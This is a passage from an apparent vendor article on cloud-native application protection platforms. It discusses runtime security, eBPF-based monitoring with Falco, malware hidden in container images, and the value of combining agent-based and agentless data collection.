potential security issues or active attacks to light. Runtime visibility can be delivered using a few different techniques: implementing traditional security agents within containers; using privileged containers; integrating Kubernetes data into your security tools; and using the Extended Berkeley Packet Filter (eBPF) to get real-time insight. With a new eBPF probe in its toolkit, the open-source project Falco supports runtime security insight into cloud deployments, containers, and Kubernetes deployments. 

A proper CNAPP, according to Gartner, must cover each of these use cases and ensure that they are managed effectively as part of the overall approach to cloud security. This means providing holistic and effective insight into what is taking place across the cloud, as well as how these environments are running over time.

Risks at runtime

Runtime security is essential to keeping your cloud environment secure. The reasons why cloud environments are popular, which include fast deployments and efficient and effective automation, are just as applicable to threat actors in their quest to attack enterprises and subvert systems. According to our 2023 Global Cloud Threat Report, the time between a threat actor gaining initial access and a payload being executed is ten minutes. Their ability to convert our potential risks into their cryptomining or malware attacks is faster in the cloud because some of the steps in a cloud attack can be automated. This reduction in required attacker efforts also allows them to scale up their attacks.

Runtime analysis can also help find hidden malicious images. Attackers can obfuscate their container image code so that when the images are scanned for malware or potential vulnerabilities, they are unidentified by static scanners and vulnerability scanning. In our research, we analyzed more than 13,000 container images found on Docker Hub and discovered 819 that contained malware. More than 10 percent of these malware-laden containers passed through static analysis and vulnerability scanning without being detected. Once a container with a secretly malicious image gets past your static and vulnerability scans, the container is run and the image will carry out its nefarious activity such as connecting to an attacker IP, installing a cryptominer, or implementing a proxy network. Proactive runtime analysis across your cloud environment will mitigate the risk of this happening by detecting the threat before damage is done.

The role of data in cloud security

CNAPP data collection and management should include both agent-based and agentless tools. Agentless security tools are dependent on the cloud provider’s APIs to carry out their tasks, which include collecting data from services and replicating workloads and scanning those copies. Agentless approaches are fast to implement, but they only provide snippets of information, not real-time continuous insight into runtime environments.

Conversely, agent-based security tools use agents or probes placed within the cloud workloads to generate the runtime insights that agentless tools cannot. This level of detail provides real-time visibility of runtime implementations and potential risks, but can take more time to get started. Between the two, these tools will provide the data you need from your cloud applications, infrastructure, and runtime environments to make informed security decisions. Rather than agent-based or agentless approaches, the right approach must include both. 

Every component in your cloud environment can output data on its operations, and this will be where you can find anomalies or evidence of attacks. Due to the sheer number of running applications, components, and containers which are all implemented on Kubernetes and connected by APIs, the volume of data available can be overwhelming. All this data has to be sorted, understood, and prioritized in a timely manner so that the most valuable information can be addressed first. CNAPP delivers that prioritized information to the security team quickly and easily, so they can focus first on the most critical risks.

The cloud security champion

Securing your cloud environment is a daunting task that requires engaging with a plethora of different product acronyms across a huge variety of different infrastructures, applications, and systems. CNAPPs aim to put the power back in the hands of the security team by reducing the gaps in cloud security and making risk remediation workflows more efficient. By using a CNAPP solution to prioritize your risks across applications, infrastructure, and runtime environments, you can improve your overall cloud security posture.